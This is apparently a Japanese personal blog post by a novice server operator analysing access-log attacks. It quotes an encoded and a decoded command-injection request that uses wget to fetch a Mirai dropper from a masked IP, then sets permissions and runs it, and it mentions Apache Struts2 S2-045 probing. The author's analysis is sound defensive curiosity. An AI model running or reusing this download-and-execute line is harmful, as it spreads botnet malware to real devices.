Struts2攻撃と思われるものに交じって、こんなのが来てました。

 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F
%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33
%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37
%37%20%2A%3B%2E%2F%64%6C%72%2E%61%72%6D HTTP/1.1」

文字列を調べてみたところ「URLデコード」という処理ができそうと分かったので、デコードしてみると…

cd /tmp;wget http://XX.XXX.XXX.XX:54321/dlr.arm;chmod 777 *;./dlr.arm

（IPアドレス部分は伏字にしております）

何か外部からとってくる命令っぽかったので、wgetで「dlr.arm」とやらを取ってきてみました。

マルウェアかなぁと思い、とりあえずFileコマンドで調べると

[tmp]$ file dlr.arm
dlr.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

何かの実行ファイルっぽい。

さすがに実行はヤバそうなのでエディタで開いてみたら…

Mirai？？？

GET部分を見てみると、Mirai.armとあるので、Mirai関連の実行ファイルでも落としてくるものなんですかね。

と、悶々としていたところ、某セキュリティ調査機関のメルマガでまったく同じものがレポートとして配信されていました。やっぱりwgetで手に入れたマルウェアはMiraiのDropperだったようです。

そのレポートによると、このアクセスは北アメリカと日本のサーバーを狙った攻撃キャンペーンで、コマンドインジェクションでDropperダウンロードさせて実行・感染⇒Mirai本体ダウンロードして感染⇒Botnet参加となるようです。

ただし感染には「BusyBox」とやらを導入している必要があるらしい。（←これまた良く分からないので、本日はこれまで…）

3/23以降、今話題のApache Struts2の脆弱性（S2-045）を狙っているのかもしれないアクセスが急に来ていました。

Struts2を利用していると「.aciton」がURLに付くというのをWeb上で見ましたので、上記は今回の脆弱性を狙う攻撃につながるアクセスなのかなぁと。

①②③⑥⑧あたりはIPを変えながら10件以上アクセスされてました。

それぞれデフォルトで使われるようなPATHなんですかねぇ。

だとしたらこれらのPATHが使われているWebサイトは対策を行っていないと不正アクセス許しちゃったり、改ざんとかされちゃうんでしょうねぇ。どれだけあるんだろう…。

 （私が立ち上げているサイトはStrutsを入れてない（そもそもスキルがない）ので、全部404で終了してます。）

今回の脆弱性を利用する攻撃はリクエストのヘッダー部にコードが仕込まれるということなので、これ以上分からないです。

HoneyPotを構築できればもっと詳しいことわかるんだろうけど。